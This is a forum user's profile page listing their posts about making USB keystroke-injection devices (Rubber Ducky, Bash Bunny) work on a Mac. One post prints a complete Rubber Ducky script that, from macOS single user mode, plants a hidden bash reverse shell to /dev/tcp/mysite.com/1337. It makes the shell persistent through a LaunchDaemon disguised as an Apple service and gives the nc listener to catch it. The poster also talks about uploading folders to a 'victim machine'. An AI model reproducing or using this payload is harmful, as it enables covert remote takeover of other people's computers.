Jump to content

valentino00776

Active Members
  • Posts

    30
  • Joined

  • Last visited

Profile Information

  • Gender
    Male
  • Location
    London & California
  • Interests
    Tech , Cyber Security , Football and Goodlife

Recent Profile Visitors

1,043 profile views

valentino00776's Achievements

Newbie

Newbie (1/14)

  1. @StreamCenterr what a let down

  2. Do i need to reinstall bunny helper after firmware upgrade ? if so how Thanks
  3. sorry can you explain how you installed manually ? When i shh into it i can see them installed but when trying quickcreds i just end up with the machine name and empty folder. Led flashes amber but never green Thanks
  4. The original script by Patrick Mosca works in single user mode. It's a quick plugin and go and doesn't need access to passwords. Works brilliantly with rubber ducky. With my second question once gained access i wont to upload a folder to victim machine automated using bash bunny Thanks buddy
  5. no wont work in single mode buddy Another question Is there away to copy a folder from bashbunny to mac in switch mode ?
  6. I think i've managed to identify the problem Seems the mac doesn't recognize the bash bunny in single user mode so types nothing. Any ideas guys ????
  7. Sorry GermanNoob the lights just stay the same starts green the stops on red green I've tried to escape the special characters but i might as well try brain surgery. Got no idea where and which
  8. ive also tried QUACK switch1/file.txt Still no luck Ive looked at special characters as well but not experienced enough to know which ones and where ? could anyone do the script above so i can see and learn PLEASEEEEESSSS
  9. Thanks guys illwill could you please use and escape my script posted to work. ? im pulling my hair out. ?
  10. This is the original script for Rubber Ducky source.txt 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 REM Patrick Mosca REM A simple script for rooting OSX from single user mode. REM Change mysite.com to your domain name or IP address REM Change 1337 to your port number REM Catch the shell with 'nc -l -p 1337' REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/ DELAY 1000 STRING mount -uw / ENTER DELAY 2000 STRING mkdir /Library/.hidden ENTER DELAY 200 STRING echo '#!/bin/bash ENTER STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1 ENTER STRING wait' > /Library/.hidden/connect.sh ENTER DELAY 500 STRING chmod +x /Library/.hidden/connect.sh ENTER DELAY 200 STRING mkdir /Library/LaunchDaemons ENTER DELAY 200 STRING echo '<plist version="1.0"> ENTER STRING <dict> ENTER STRING <key>Label</key> ENTER STRING <string>com.apples.services</string> ENTER STRING <key>ProgramArguments</key> ENTER STRING <array> ENTER STRING <string>/bin/sh</string> ENTER STRING <string>/Library/.hidden/connect.sh</string> ENTER STRING </array> ENTER STRING <key>RunAtLoad</key> ENTER STRING <true/> ENTER STRING <key>StartInterval</key> ENTER STRING <integer>60</integer> ENTER STRING <key>AbandonProcessGroup</key> ENTER STRING <true/> ENTER STRING </dict> ENTER STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 500 STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 200 STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 1000 STRING shutdown -h now ENTER 3) Compile and install the script. From within the ducky decoder folder, execute: Move your inject.bin over to the ducky. 4) Boot into single user mode (Command – S). 5) At the command prompt, plug in ducky. 6) Catch your shell.
  11. By the way the hello world payload was tested on a windows pc not mac My script is for mac with terminal already opened. just wont type
×
×
  • Create New...